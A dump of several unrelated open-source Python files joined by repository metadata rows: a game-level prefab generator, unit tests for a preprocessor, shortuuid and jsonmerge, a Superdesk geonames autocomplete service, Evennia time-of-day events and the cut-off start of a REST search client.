y99 = int(rotatePoint((posx*512+256,posy*-1*512-256), (posx*1*512 + (192), posy*-1*512 + (-192)), 90)[1])
z99 = level*448 + 64
x100 = int(rotatePoint((posx*512+256,posy*-1*512-256), (posx*1*512 + (192), posy*-1*512 + (-192)), 90)[0])
y100 = int(rotatePoint((posx*512+256,posy*-1*512-256), (posx*1*512 + (192), posy*-1*512 + (-192)), 90)[1])
z100 = level*448 + 309
x101 = int(rotatePoint((posx*512+256,posy*-1*512-256), (posx*1*512 + (192), posy*-1*512 + (-192)), 90)[0])
y101 = int(rotatePoint((posx*512+256,posy*-1*512-256), (posx*1*512 + (192), posy*-1*512 + (-192)), 90)[1])
z101 = level*448 + 64
x102 = int(rotatePoint((posx*512+256,posy*-1*512-256), (posx*1*512 + (138), posy*-1*512 + (-192)), 90)[0])
y102 = int(rotatePoint((posx*512+256,posy*-1*512-256), (posx*1*512 + (138), posy*-1*512 + (-192)), 90)[1])
z102 = level*448 + 64
x103 = int(rotatePoint((posx*512+256,posy*-1*512-256), (posx*1*512 + (138), posy*-1*512 + (-192)), 90)[0])
y103 = int(rotatePoint((posx*512+256,posy*-1*512-256), (posx*1*512 + (138), posy*-1*512 + (-192)), 90)[1])
z103 = level*448 + 309
x104 = int(rotatePoint((posx*512+256,posy*-1*512-256), (posx*1*512 + (128), posy*-1*512 + (-181)), 90)[0])
y104 = int(rotatePoint((posx*512+256,posy*-1*512-256), (posx*1*512 + (128), posy*-1*512 + (-181)), 90)[1])
z104 = level*448 + 309
x105 = int(rotatePoint((posx*512+256,posy*-1*512-256), (posx*1*512 + (128), posy*-1*512 + (-74)), 90)[0])
y105 = int(rotatePoint((posx*512+256,posy*-1*512-256), (posx*1*512 + (128), posy*-1*512 + (-74)), 90)[1])
z105 = level*448 + 309
x106 = int(rotatePoint((posx*512+256,posy*-1*512-256), (posx*1*512 + (192), posy*-1*512 + (-138)), 90)[0])
y106 = int(rotatePoint((posx*512+256,posy*-1*512-256), (posx*1*512 + (192), posy*-1*512 + (-138)), 90)[1])
z106 = level*448 + 64
x107 = int(rotatePoint((posx*512+256,posy*-1*512-256), (posx*1*512 + (128), posy*-1*512 + (-74)), 90)[0])
y107 = int(rotatePoint((posx*512+256,posy*-1*512-256), (posx*1*512 + (128), posy*-1*512 + (-74)), 90)[1])
z107 = level*448 + 64
x108 = int(rotatePoint((posx*512+256,posy*-1*512-256), (posx*1*512 + (128), posy*-1*512 + (-181)), 90)[0])
y108 = int(rotatePoint((posx*512+256,posy*-1*512-256), (posx*1*512 + (128), posy*-1*512 + (-181)), 90)[1])
z108 = level*448 + 64
x109 = int(rotatePoint((posx*512+256,posy*-1*512-256), (posx*1*512 + (128), posy*-1*512 + (-181)), 90)[0])
y109 = int(rotatePoint((posx*512+256,posy*-1*512-256), (posx*1*512 + (128), posy*-1*512 + (-181)), 90)[1])
z109 = level*448 + 309
x110 = int(rotatePoint((posx*512+256,posy*-1*512-256), (posx*1*512 + (128), posy*-1*512 + (-181)), 90)[0])
y110 = int(rotatePoint((posx*512+256,posy*-1*512-256), (posx*1*512 + (128), posy*-1*512 + (-181)), 90)[1])
z110 = level*448 + 64
x111 = int(rotatePoint((posx*512+256,posy*-1*512-256), (posx*1*512 + (128), posy*-1*512 + (-74)), 90)[0])
y111 = int(rotatePoint((posx*512+256,posy*-1*512-256), (posx*1*512 + (128), posy*-1*512 + (-74)), 90)[1])
z111 = level*448 + 64
x112 = int(rotatePoint((posx*512+256,posy*-1*512-256), (posx*1*512 + (53), posy*-1*512), 90)[0])
y112 = int(rotatePoint((posx*512+256,posy*-1*512-256), (posx*1*512 + (53), posy*-1*512), 90)[1])
z112 = level*448 + 64
x113 = int(rotatePoint((posx*512+256,posy*-1*512-256), (posx*1*512 + (128), posy*-1*512 + (-74)), 90)[0])
y113 = int(rotatePoint((posx*512+256,posy*-1*512-256), (posx*1*512 + (128), posy*-1*512 + (-74)), 90)[1])
z113 = level*448 + 64
x114 = int(rotatePoint((posx*512+256,posy*-1*512-256), (posx*1*512 + (128), posy*-1*512 + (-74)), 90)[0])
y114 = int(rotatePoint((posx*512+256,posy*-1*512-256), (posx*1*512 + (128), posy*-1*512 + (-74)), 90)[1])
z114 = level*448 + 309
x115 = int(rotatePoint((posx*512+256,posy*-1*512-256), (posx*1*512 + (128), posy*-1*512 + (-181)), 90)[0])
y115 = int(rotatePoint((posx*512+256,posy*-1*512-256), (posx*1*512 + (128), posy*-1*512 + (-181)), 90)[1])
z115 = level*448 + 64
x116 = int(rotatePoint((posx*512+256,posy*-1*512-256), (posx*1*512, posy*-1*512 + (-53)), 90)[0])
y116 = int(rotatePoint((posx*512+256,posy*-1*512-256), (posx*1*512, posy*-1*512 + (-53)), 90)[1])
z116 = level*448 + 64
x117 = int(rotatePoint((posx*512+256,posy*-1*512-256), (posx*1*512, posy*-1*512 + (-53)), 90)[0])
y117 = int(rotatePoint((posx*512+256,posy*-1*512-256), (posx*1*512, posy*-1*512 + (-53)), 90)[1])
z117 = level*448 + 309
x118 = int(rotatePoint((posx*512+256,posy*-1*512-256), (posx*1*512, posy*-1*512 + (-53)), 90)[0])
y118 = int(rotatePoint((posx*512+256,posy*-1*512-256), (posx*1*512, posy*-1*512 + (-53)), 90)[1])
z118 = level*448 + 309
x119 = int(rotatePoint((posx*512+256,posy*-1*512-256), (posx*1*512, posy*-1*512 + (-53)), 90)[0])
y119 = int(rotatePoint((posx*512+256,posy*-1*512-256), (posx*1*512, posy*-1*512 + (-53)), 90)[1])
z119 = level*448 + 64
x120 = int(rotatePoint((posx*512+256,posy*-1*512-256), (posx*1*512, posy*-1*512), 90)[0])
y120 = int(rotatePoint((posx*512+256,posy*-1*512-256), (posx*1*512, posy*-1*512), 90)[1])
z120 = level*448 + 64
x121 = int(rotatePoint((posx*512+256,posy*-1*512-256), (posx*1*512 + (128), posy*-1*512 + (-181)), 90)[0])
y121 = int(rotatePoint((posx*512+256,posy*-1*512-256), (posx*1*512 + (128), posy*-1*512 + (-181)), 90)[1])
z121 = level*448 + 309
x122 = int(rotatePoint((posx*512+256,posy*-1*512-256), (posx*1*512, posy*-1*512 + (-53)), 90)[0])
y122 = int(rotatePoint((posx*512+256,posy*-1*512-256), (posx*1*512, posy*-1*512 + (-53)), 90)[1])
z122 = level*448 + 309
x123 = int(rotatePoint((posx*512+256,posy*-1*512-256), (posx*1*512, posy*-1*512), 90)[0])
y123 = int(rotatePoint((posx*512+256,posy*-1*512-256), (posx*1*512, posy*-1*512), 90)[1])
z123 = level*448 + 309
x124 = int(rotatePoint((posx*512+256,posy*-1*512-256), (posx*1*512 + (128), posy*-1*512 + (-74)), 90)[0])
y124 = int(rotatePoint((posx*512+256,posy*-1*512-256), (posx*1*512 + (128), posy*-1*512 + (-74)), 90)[1])
z124 = level*448 + 64
x125 = int(rotatePoint((posx*512+256,posy*-1*512-256), (posx*1*512 + (53), posy*-1*512), 90)[0])
y125 = int(rotatePoint((posx*512+256,posy*-1*512-256), (posx*1*512 + (53), posy*-1*512), 90)[1])
z125 = level*448 + 64
x126 = int(rotatePoint((posx*512+256,posy*-1*512-256), (posx*1*512, posy*-1*512), 90)[0])
y126 = int(rotatePoint((posx*512+256,posy*-1*512-256), (posx*1*512, posy*-1*512), 90)[1])
z126 = level*448 + 64
x127 = int(rotatePoint((posx*512+256,posy*-1*512-256), (posx*1*512 + (128), posy*-1*512 + (-74)), 90)[0])
y127 = int(rotatePoint((posx*512+256,posy*-1*512-256), (posx*1*512 + (128), posy*-1*512 + (-74)), 90)[1])
z127 = level*448 + 309
x128 = int(rotatePoint((posx*512+256,posy*-1*512-256), (posx*1*512 + (128), posy*-1*512 + (-74)), 90)[0])
y128 = int(rotatePoint((posx*512+256,posy*-1*512-256), (posx*1*512 + (128), posy*-1*512 + (-74)), 90)[1])
z128 = level*448 + 64
x129 = int(rotatePoint((posx*512+256,posy*-1*512-256), (posx*1*512 + (128), posy*-1*512 + (-181)), 90)[0])
y129 = int(rotatePoint((posx*512+256,posy*-1*512-256), (posx*1*512 + (128), posy*-1*512 + (-181)), 90)[1])
z129 = level*448 + 64
x130 = int(rotatePoint((posx*512+256,posy*-1*512-256), (posx*1*512, posy*-1*512), 90)[0])
y130 = int(rotatePoint((posx*512+256,posy*-1*512-256), (posx*1*512, posy*-1*512), 90)[1])
z130 = level*448 + 309
x131 = int(rotatePoint((posx*512+256,posy*-1*512-256), (posx*1*512, posy*-1*512), 90)[0])
y131 = int(rotatePoint((posx*512+256,posy*-1*512-256), (posx*1*512, posy*-1*512), 90)[1])
z131 = level*448 + 64
x132 = int(rotatePoint((posx*512+256,posy*-1*512-256), (posx*1*512 + (53), posy*-1*512), 90)[0])
y132 = int(rotatePoint((posx*512+256,posy*-1*512-256), (posx*1*512 + (53), posy*-1*512), 90)[1])
z132 = level*448 + 64
#INSERT_ROT_3_PY_LIST
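# x1..x132 / y1..y132 / z1..z132 now hold every brush vertex for this prefab; the template text in 'lines' refers to them by name and is filled in below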
var_count = 132
values = "".join(lines)#converting list to string
ogvalues = "".join(lines)
normal_list,axislist,negaxislist,vaxis,uaxis=[],['1 0 0 1','0 1 0 1','0 0 1 1'],['-1 0 0 1','0 -1 0 1','0 0 -1 1'],0,0
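# get_normal() returns the cross product of two face edges; evaluate() picks which world axis that normal points along most strongly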
def evaluate(coords):
dist_x,dist_y,dist_z = abs(coords[0]),abs(coords[1]),abs(coords[2]),
if dist_x >= dist_y and dist_x >= dist_z:
return axislist[0]
if dist_y >= dist_z:
return axislist[1]
return axislist[2]
def get_normal(coord_list):
vector_a = (coord_list[1][0]-coord_list[0][0],coord_list[1][1]-coord_list[0][1],coord_list[1][2]-coord_list[0][2])
vector_b = (coord_list[2][0]-coord_list[0][0],coord_list[2][1]-coord_list[0][1],coord_list[2][2]-coord_list[0][2])
normal = (vector_a[1]*vector_b[2]-vector_a[2]*vector_b[1],vector_a[2]*vector_b[0]-vector_a[0]*vector_b[2],vector_a[0]*vector_b[1]-vector_a[1]*vector_b[0])
return normal
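# every 3 consecutive vertices describe one face: find the dominant axis of its normal and pick perpendicular texture axes for that face's AXIS_REPLACE_U / AXIS_REPLACE_V placeholders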
for normal_num in range(1,var_count+1,3):
normal_list=[]
for i in range(3):
normal_list.append([])
for var in ["x", "y", "z"]:
normal_list[i].append(eval(var+str(normal_num+i)))
coords = get_normal(normal_list)
response = evaluate(coords)
if response == axislist[0]:
uaxis = axislist[1]
else:
uaxis = axislist[0]
if response == axislist[2]:
vaxis = negaxislist[1]
else:
vaxis = negaxislist[2]
values = values.replace('AXIS_REPLACE_U',uaxis,1)
values = values.replace('AXIS_REPLACE_V',vaxis,1)
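# give each 'world_idnum' placeholder its own incrementing world id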
for i in range(ogvalues.count("world_idnum")):
values = values.replace('world_idnum', str(world_id_num), 1)
world_id_num += 1
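# swap the vertex variable names for their values; the trailing ' ' or ')' delimiter stops e.g. x1 from also matching x10..x13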
for var in ["x", "y", "z"]:
for count in range(1,var_count+1):
string = var + str(count)
string_var = str(eval(var + str(count)))
if var == "z":
values = values.replace(string + ")",string_var + ")") #we need to do this or else it will mess up on 2 digit numbers
else:
values = values.replace(string + " ",string_var + " ")
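# unique ids for every brush and side in the template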
for i in range(ogvalues.count('id_num')):
values = values.replace('id_num', str(id_num), 1)
id_num = id_num+1
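# ROTATION_* placeholders orient any entities baked into the brush template: each tile rotation step turns the yaw by 90 degrees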
if "ROTATION_RIGHT" in values:
if rotation == 0:
values = values.replace("ROTATION_RIGHT","0 0 0",1)
elif rotation == 1:
values = values.replace("ROTATION_RIGHT","0 270 0",1)
elif rotation == 2:
values = values.replace("ROTATION_RIGHT","0 180 0",1)
elif rotation == 3:
values = values.replace("ROTATION_RIGHT","0 90 0",1)
if "ROTATION_UP" in values:
if rotation == 0:
values = values.replace("ROTATION_UP","0 90 0",1)
elif rotation == 1:
values = values.replace("ROTATION_UP","0 0 0",1)
elif rotation == 2:
values = values.replace("ROTATION_UP","0 270 0",1)
elif rotation == 3:
values = values.replace("ROTATION_UP","0 180 0",1)
if "ROTATION_LEFT" in values:
if rotation == 0:
values = values.replace("ROTATION_LEFT","0 180 0",1)
elif rotation == 1:
values = values.replace("ROTATION_LEFT","0 90 0",1)
elif rotation == 2:
values = values.replace("ROTATION_LEFT","0 0 0",1)
elif rotation == 3:
values = values.replace("ROTATION_LEFT","0 270 0",1)
if "ROTATION_DOWN" in values:
if rotation == 0:
values = values.replace("ROTATION_DOWN","0 270 0",1)
elif rotation == 1:
values = values.replace("ROTATION_DOWN","0 180 0",1)
elif rotation == 2:
values = values.replace("ROTATION_DOWN","0 90 0",1)
elif rotation == 3:
values = values.replace("ROTATION_DOWN","0 0 0",1)
values = values.replace('"[0 0 0 1] 0.25"','"[1 1 1 1] 0.25"')
values = values.replace('"[0 0 1 0] 0.25"','"[1 1 1 1] 0.25"')
values = values.replace('"[0 1 0 0] 0.25"','"[1 1 1 1] 0.25"')
values = values.replace('"[1 0 0 0] 0.25"','"[1 1 1 1] 0.25"')
g = open('prefab_template/diag_wall_egypt_entities.txt', 'r+')
lines_ent = g.readlines()
if rotation == 0:
px1 = posx*1*512 + (256)
py1 = posy*-1*512 + (-40)
pz1 = level*448 + 73
px2 = posx*1*512 + (80)
py2 = posy*-1*512 + (-396)
pz2 = level*448 + 73
px3 = posx*1*512 + (336)
py3 = posy*-1*512 + (-312)
pz3 = level*448 + 72
#INSERT_ROT_0_PY_LIST
elif rotation == 1:
px1 = int(rotatePoint((posx*512+256,posy*-1*512-256), (posx*1*512 + (256), posy*-1*512 + (-40)), 270)[0])
py1 = int(rotatePoint((posx*512+256,posy*-1*512-256), (posx*1*512 + (256), posy*-1*512 + (-40)), 270)[1])
pz1 = level*448 + 73
px2 = int(rotatePoint((posx*512+256,posy*-1*512-256), (posx*1*512 + (80), posy*-1*512 + (-396)), 270)[0])
py2 = int(rotatePoint((posx*512+256,posy*-1*512-256), (posx*1*512 + (80), posy*-1*512 + (-396)), 270)[1])
pz2 = level*448 + 73
px3 = int(rotatePoint((posx*512+256,posy*-1*512-256), (posx*1*512 + (336), posy*-1*512 + (-312)), 270)[0])
py3 = int(rotatePoint((posx*512+256,posy*-1*512-256), (posx*1*512 + (336), posy*-1*512 + (-312)), 270)[1])
pz3 = level*448 + 72
#INSERT_ROT_1_PY_LIST
elif rotation == 2:
px1 = int(rotatePoint((posx*512+256,posy*-1*512-256), (posx*1*512 + (256), posy*-1*512 + (-40)), 180)[0])
py1 = int(rotatePoint((posx*512+256,posy*-1*512-256), (posx*1*512 + (256), posy*-1*512 + (-40)), 180)[1])
pz1 = level*448 + 73
px2 = int(rotatePoint((posx*512+256,posy*-1*512-256), (posx*1*512 + (80), posy*-1*512 + (-396)), 180)[0])
py2 = int(rotatePoint((posx*512+256,posy*-1*512-256), (posx*1*512 + (80), posy*-1*512 + (-396)), 180)[1])
pz2 = level*448 + 73
px3 = int(rotatePoint((posx*512+256,posy*-1*512-256), (posx*1*512 + (336), posy*-1*512 + (-312)), 180)[0])
py3 = int(rotatePoint((posx*512+256,posy*-1*512-256), (posx*1*512 + (336), posy*-1*512 + (-312)), 180)[1])
pz3 = level*448 + 72
#INSERT_ROT_2_PY_LIST
elif rotation == 3:
px1 = int(rotatePoint((posx*512+256,posy*-1*512-256), (posx*1*512 + (256), posy*-1*512 + (-40)), 90)[0])
py1 = int(rotatePoint((posx*512+256,posy*-1*512-256), (posx*1*512 + (256), posy*-1*512 + (-40)), 90)[1])
pz1 = level*448 + 73
px2 = int(rotatePoint((posx*512+256,posy*-1*512-256), (posx*1*512 + (80), posy*-1*512 + (-396)), 90)[0])
py2 = int(rotatePoint((posx*512+256,posy*-1*512-256), (posx*1*512 + (80), posy*-1*512 + (-396)), 90)[1])
pz2 = level*448 + 73
px3 = int(rotatePoint((posx*512+256,posy*-1*512-256), (posx*1*512 + (336), posy*-1*512 + (-312)), 90)[0])
py3 = int(rotatePoint((posx*512+256,posy*-1*512-256), (posx*1*512 + (336), posy*-1*512 + (-312)), 90)[1])
pz3 = level*448 + 72
#INSERT_ROT_3_PY_LIST
ent_var_count = 3
ent_values = "".join(lines_ent)
ent_values_split = ent_values.split("\"")
valcount = "".join(lines_ent)
for item in ent_values_split:
if "entity_name" in item or "parent_name" in item or "door_large" in item:
placeholder_list.append(item)
for i in range(valcount.count('world_idnum')):
ent_values = ent_values.replace('world_idnum', str(world_id_num), 1)
world_id_num += 1
for var in ["px", "py", "pz"]:
for count in range(1,ent_var_count+1):
string = var + str(count)
string_var = str(eval(var + str(count)))
if var == "pz":
                ent_values = ent_values.replace(string + "\"",string_var + "\"") # anchor on the trailing quote so e.g. pz1 is not also replaced inside pz10
else:
ent_values = ent_values.replace(string + " ",string_var + " ")
for var in ["x", "y", "z"]:
for count in range(1,var_count+1):
try:
string = var + str(count)
string_var = str(eval(var + str(count)))
if var == "z":
                    ent_values = ent_values.replace(string + ")",string_var + ")") # anchor on the trailing ")" so e.g. z1 is not also replaced inside z10
else:
ent_values = ent_values.replace(string + " ",string_var + " ")
except:
pass
for i in range(valcount.count('id_num')):
ent_values = ent_values.replace('id_num', str(id_num), 1)
id_num = id_num+1
for i in range(int(valcount.count('laser_target')/2)):
if "laser_target_plac" in ent_values:
ent_values = ent_values.replace("laser_target_plac", "laser_target" + str(entity_num), 2)
entity_num += 1
for i in range(int(valcount.count('sound'))):
if "sound_plac" in ent_values:
ent_values = ent_values.replace("sound_plac", "AmbSound"+str(entity_num), 2)
ent_values = ent_values.replace("relay_plac", "LogicRelay"+str(entity_num),2)
entity_num += 1
for i in range(valcount.count("entity_name")):
try:
ent_values = ent_values.replace("entity_name", "entity" + str(entity_num), 1)
ent_values = ent_values.replace("entity_same", "entity" + str(entity_num), 1)
if "parent_name" in placeholder_list[entity_num]:
ent_values = ent_values.replace("parent_name", "entity" + str(entity_num), 1)
placeholder_list.remove(placeholder_list[entity_num])
if "door_large" in ent_values:
ent_values = ent_values.replace("door_large", "door_large" + str(entity_num), 4)
if "\"respawn_name\"" in ent_values:
ent_values = ent_values.replace("\"respawn_name\"", "\"respawn_name" + str(entity_num) + "\"", 2)
entity_num += 1
except Exception as e:
print(str(e))
for i in range(valcount.count("ROTATION")):
if "ROTATION_RIGHT" in ent_values:
if rotation == 0:
ent_values = ent_values.replace("ROTATION_RIGHT","0 0 0",1)
elif rotation == 1:
ent_values = ent_values.replace("ROTATION_RIGHT","0 270 0",1)
elif rotation == 2:
ent_values = ent_values.replace("ROTATION_RIGHT","0 180 0 ",1)
elif rotation == 3:
ent_values = ent_values.replace("ROTATION_RIGHT","0 90 0",1)
if "ROTATION_LEFT" in ent_values:
if rotation == 0:
ent_values = ent_values.replace("ROTATION_LEFT","0 180 0",1)
elif rotation == 1:
ent_values = ent_values.replace("ROTATION_LEFT","0 90 0",1)
elif rotation == 2:
ent_values = ent_values.replace("ROTATION_LEFT","0 0 0",1)
elif rotation == 3:
ent_values = ent_values.replace("ROTATION_LEFT","0 270 0",1)
if "ROTATION_DOWN" in ent_values:
if rotation == 0:
ent_values = ent_values.replace("ROTATION_DOWN","0 270 0",1)
elif rotation == 1:
ent_values = ent_values.replace("ROTATION_DOWN","0 180 0",1)
elif rotation == 2:
ent_values = ent_values.replace("ROTATION_DOWN","0 90 0",1)
elif rotation == 3:
ent_values = ent_values.replace("ROTATION_DOWN","0 0 0",1)
if "ROTATION_UP" in ent_values:
if rotation == 0:
ent_values = ent_values.replace("ROTATION_UP","0 90 0",1)
elif rotation == 1:
ent_values = ent_values.replace("ROTATION_UP","0 0 0",1)
elif rotation == 2:
ent_values = ent_values.replace("ROTATION_UP","0 270 0",1)
elif rotation == 3:
ent_values = ent_values.replace("ROTATION_UP","0 180 0",1)
entity_num += 1
return values, id_num, world_id_num, entity_num, ent_values, placeholder_list | gpl-3.0 | -5,276,287,045,558,843,000 | 66.641903 | 162 | 0.534795 | false |
PietroPasotti/MACH | utils/tests/preprocess_unittest.py | 1 | 1094 |
import unittest
from mach.utils import preprocess
example = '/home/pietro/Perceptum/code/mach/mach/utils/twosentences.txt'
shouldbe = {0: {
0: {'tags': set(), 'word': 'The'},
1: {'tags': set(), 'word': 'great'},
2: {'tags': set(), 'word': 'gig'},
3: {'tags': set(), 'word': 'in'},
4: {'tags': set(), 'word': 'the'},
5: {'tags': set(), 'word': 'sky.'}
},
1: {
0: {'tags': set(), 'word': 'The'},
1: {'tags': set(), 'word': 'gods'},
2: {'tags': set(), 'word': 'are'},
3: {'tags': set(), 'word': 'everywhere.'}
}
}
class TestStructure(unittest.TestCase):
def setUp(self):
self.structure = preprocess.Structure(example)
def test_main_structure(self):
self.assertEqual( self.structure.content, shouldbe )
if __name__ == '__main__':
unittest.main()
| agpl-3.0 | 3,418,362,564,199,355,400 | 33.1875 | 76 | 0.40585 | false |
gregorynicholas/shortuuid | shortuuid/tests.py | 1 | 2948 | import os
import sys
import unittest
from uuid import UUID, uuid4
sys.path.insert(0, os.path.abspath(__file__ + "/../.."))
from shortuuid.main import *
class LegacyShortUUIDTest(unittest.TestCase):
def test_generation(self):
        self.assertTrue(20 < len(uuid()) < 24)
self.assertTrue(20 < len(uuid("http://www.example.com/")) < 24)
self.assertTrue(20 < len(uuid("HTTP://www.example.com/")) < 24)
self.assertTrue(20 < len(uuid("example.com/")) < 24)
def test_encoding(self):
u = UUID('{12345678-1234-5678-1234-567812345678}')
self.assertEquals(encode(u), "VoVuUtBhZ6TvQSAYEqNdF5")
def test_decoding(self):
u = UUID('{12345678-1234-5678-1234-567812345678}')
self.assertEquals(decode("VoVuUtBhZ6TvQSAYEqNdF5"), u)
def test_alphabet(self):
backup_alphabet = get_alphabet()
alphabet = "01"
set_alphabet(alphabet)
self.assertEquals(alphabet, get_alphabet())
set_alphabet("01010101010101")
self.assertEquals(alphabet, get_alphabet())
self.assertEquals(set(uuid()), set("01"))
self.assertTrue(116 < len(uuid()) < 140)
u = uuid4()
self.assertEquals(u, decode(encode(u)))
u = uuid()
self.assertEquals(u, encode(decode(u)))
self.assertRaises(ValueError, set_alphabet, "1")
self.assertRaises(ValueError, set_alphabet, "1111111")
set_alphabet(backup_alphabet)
class ClassShortUUIDTest(unittest.TestCase):
def test_generation(self):
su = ShortUUID()
self.assertTrue(20 < len(su.uuid()) < 24)
self.assertTrue(20 < len(su.uuid("http://www.example.com/")) < 24)
self.assertTrue(20 < len(su.uuid("HTTP://www.example.com/")) < 24)
self.assertTrue(20 < len(su.uuid("example.com/")) < 24)
def test_encoding(self):
su = ShortUUID()
u = UUID('{12345678-1234-5678-1234-567812345678}')
self.assertEquals(su.encode(u), "VoVuUtBhZ6TvQSAYEqNdF5")
def test_decoding(self):
su = ShortUUID()
u = UUID('{12345678-1234-5678-1234-567812345678}')
self.assertEquals(su.decode("VoVuUtBhZ6TvQSAYEqNdF5"), u)
def test_alphabet(self):
alphabet = "01"
su1 = ShortUUID(alphabet)
su2 = ShortUUID()
self.assertEquals(alphabet, su1.get_alphabet())
su1.set_alphabet("01010101010101")
self.assertEquals(alphabet, su1.get_alphabet())
self.assertEquals(set(su1.uuid()), set("01"))
self.assertTrue(116 < len(su1.uuid()) < 140)
self.assertTrue(20 < len(su2.uuid()) < 24)
u = uuid4()
self.assertEquals(u, su1.decode(su1.encode(u)))
u = su1.uuid()
self.assertEquals(u, su1.encode(su1.decode(u)))
self.assertRaises(ValueError, su1.set_alphabet, "1")
self.assertRaises(ValueError, su1.set_alphabet, "1111111")
if __name__ == '__main__':
unittest.main()
| bsd-3-clause | -3,858,694,331,504,901,600 | 30.361702 | 74 | 0.61635 | false |
superdesk/superdesk-core | superdesk/places/places_autocomplete.py | 1 | 2132 | import superdesk
from flask import current_app as app
from superdesk.utils import ListCursor
from superdesk.geonames import geonames_request, format_geoname_item
class PlacesAutocompleteResource(superdesk.Resource):
resource_methods = ["GET"]
item_methods = []
schema = {
"scheme": {"type": "string"},
"code": {"type": "string"},
"name": {"type": "string"},
"state": {"type": "string"},
"region": {"type": "string"},
"country": {"type": "string"},
"state_code": {"type": "string"},
"region_code": {"type": "string"},
"country_code": {"type": "string"},
"continent_code": {"type": "string"},
"feature_class": {"type": "string"},
"location": {
"type": "dict",
"schema": {
"lat": {"type": "float"},
"lon": {"type": "float"},
},
},
"tz": {"type": "string"},
}
class PlacesAutocompleteService(superdesk.Service):
def get(self, req, lookup):
assert req.args.get("name"), {"name": 1}
params = [
("name", req.args.get("name")),
("lang", req.args.get("lang", "en").split("-")[0]),
("style", req.args.get("style", app.config["GEONAMES_SEARCH_STYLE"])),
]
if req.args.get("featureClass"):
params.append(("featureClass", req.args.get("featureClass")))
else:
for feature_class in app.config["GEONAMES_FEATURE_CLASSES"]:
params.append(("featureClass", feature_class.upper()))
json_data = geonames_request("search", params)
data = [format_geoname_item(item) for item in json_data.get("geonames", [])]
return ListCursor(data)
def get_place(self, geoname_id, language="en"):
assert geoname_id
params = [
("geonameId", geoname_id),
("lang", language),
("style", app.config.get("GEONAMES_SEARCH_STYLE", "full")),
]
json_data = geonames_request("getJSON", params)
data = format_geoname_item(json_data)
return data
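
# Added sketch (hypothetical usage; the service name, geoname id and language
# below are guesses, not taken from this file): the service is normally
# resolved through superdesk's service registry, e.g.
#     service = superdesk.get_resource_service('places_autocomplete')
#     place = service.get_place('2643743', language='en')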
| agpl-3.0 | -1,543,517,481,427,133,700 | 32.3125 | 84 | 0.532364 | false |
avian2/jsonmerge | tests/test_jsonvalue.py | 1 | 2336 | # vim:ts=4 sw=4 expandtab softtabstop=4
import unittest
from jsonmerge.jsonvalue import JSONValue
class TestJSONValue(unittest.TestCase):
def test_get_attr(self):
v = JSONValue({'a': 'b'})
va = v['a']
self.assertEqual('b', va.val)
self.assertEqual('#/a', va.ref)
def test_get_attr_nonascii(self):
v = JSONValue({u'\u20ac': 'b'})
va = v[u'\u20ac']
self.assertEqual('b', va.val)
self.assertEqual(u'#/\u20ac', va.ref)
def test_get_attr_escape_slash(self):
v = JSONValue({'a/b': 'c'})
va = v['a/b']
self.assertEqual('c', va.val)
self.assertEqual('#/a~1b', va.ref)
def test_get_attr_escape_tilde(self):
v = JSONValue({'~0': 'a'})
va = v['~0']
self.assertEqual('a', va.val)
self.assertEqual('#/~00', va.ref)
def test_get_default(self):
v = JSONValue({})
va = v.get('a')
self.assertTrue(va.is_undef())
def test_get(self):
v = JSONValue({'a': 'b'})
va = v.get('a')
self.assertTrue('b', va.val)
self.assertEqual('#/a', va.ref)
def test_undef(self):
v = JSONValue(undef=True)
self.assertTrue(v.is_undef())
def test_dict_set_attr(self):
v = JSONValue({})
v['a'] = JSONValue('b')
self.assertEqual({'a': 'b'}, v.val)
def test_dict_set_attr_undef(self):
v = JSONValue({})
v['a'] = JSONValue(undef=True)
self.assertEqual({}, v.val)
def test_dict_set_attr_undef_exists(self):
v = JSONValue({'a': 'b'})
v['a'] = JSONValue(undef=True)
self.assertEqual({}, v.val)
def test_list_set_attr(self):
v = JSONValue([1])
v[0] = JSONValue(2)
self.assertEqual([2], v.val)
def test_list_set_attr_undef_exists(self):
v = JSONValue([1])
# Setting a list element to undef does not make sense.
with self.assertRaises(ValueError) as cm:
v[0] = JSONValue(undef=True)
def test_list_set_attr_undef(self):
v = JSONValue([])
with self.assertRaises(ValueError) as cm:
v[0] = JSONValue(undef=True)
def test_append_undef(self):
v = JSONValue([])
v.append(JSONValue(undef=True))
self.assertEqual([], v.val)
| mit | -1,381,239,825,514,151,000 | 22.836735 | 62 | 0.538527 | false |
whitehorse-io/encarnia | Encarnia/world/ingame_time_original.py | 1 | 2199 | # in a file ingame_time.py in mygame/world/
from evennia.utils import gametime
from typeclasses.rooms import Room
# Sunrise!
def at_sunrise():
"""When the sun rises, display a message in every room."""
# Browse all rooms
for room in Room.objects.all():
room.msg_contents("The sun rises from the eastern horizon.")
def start_sunrise_event():
    """Schedule a sunrise event to happen every day at 6 AM."""
script = gametime.schedule(at_sunrise, repeat=True, hour=6, min=0, sec=0)
script.key = "at sunrise"
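
# Added sketch (not part of the original module): a convenience starter that
# registers every daily event at once; the remaining start_* helpers are
# defined later in this module. Calling this from a server-start hook is an
# assumption about how the game wires things up.
def start_all_time_events():
    start_sunrise_event()
    start_noon_event()
    start_sunset_event()
    start_nightstart_event()
    start_midnight_event()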
# noon
def at_noon():
"""Noon message."""
# Browse all rooms
for room in Room.objects.all():
room.msg_contents("The sun sits high and mighty, directly above Encarnia.")
def start_noon_event():
    """Schedule a noon event to happen every day at 12 PM (noon)."""
    script = gametime.schedule(at_noon, repeat=True, hour=12, min=0, sec=0)
script.key = "at noon"
# sunset
def at_sunset():
"""Sunset message."""
# Browse all rooms
for room in Room.objects.all():
room.msg_contents("The sun begins to settle into the horizon, inviting the moon to take its place.")
def start_sunset_event():
    """Schedule a sunset event to happen every day at 5 PM."""
    script = gametime.schedule(at_sunset, repeat=True, hour=17, min=0, sec=0)
script.key = "at sunset"
# night
def at_nightstart():
"""nightstart event."""
# Browse all rooms
for room in Room.objects.all():
room.msg_contents("The last of the sun's light has disappeared; it is now night.")
def start_nightstart_event():
    """Schedule a nightstart event to happen every day at 8 PM."""
    script = gametime.schedule(at_nightstart, repeat=True, hour=20, min=0, sec=0)
script.key = "at nightstart"
#midnight stars
def at_midnight():
"""midnight event message."""
# Browse all rooms
for room in Room.objects.all():
room.msg_contents("Thousands of stars twinkle in the clear midnight sky.")
def start_midnight_event():
    """Schedule a midnight event message to happen every day at midnight."""
    script = gametime.schedule(at_midnight, repeat=True, hour=0, min=0, sec=0)
script.key = "at midnight" | mit | 2,210,577,861,242,035,700 | 32.390625 | 108 | 0.650296 | false |
Maxime2/dpsearch-python | searchd-rest.py | 1 | 1255 | #!/usr/bin/python
import json
import urllib
import urllib2
url = 'http://inet-sochi.ru:7003/'
params = {
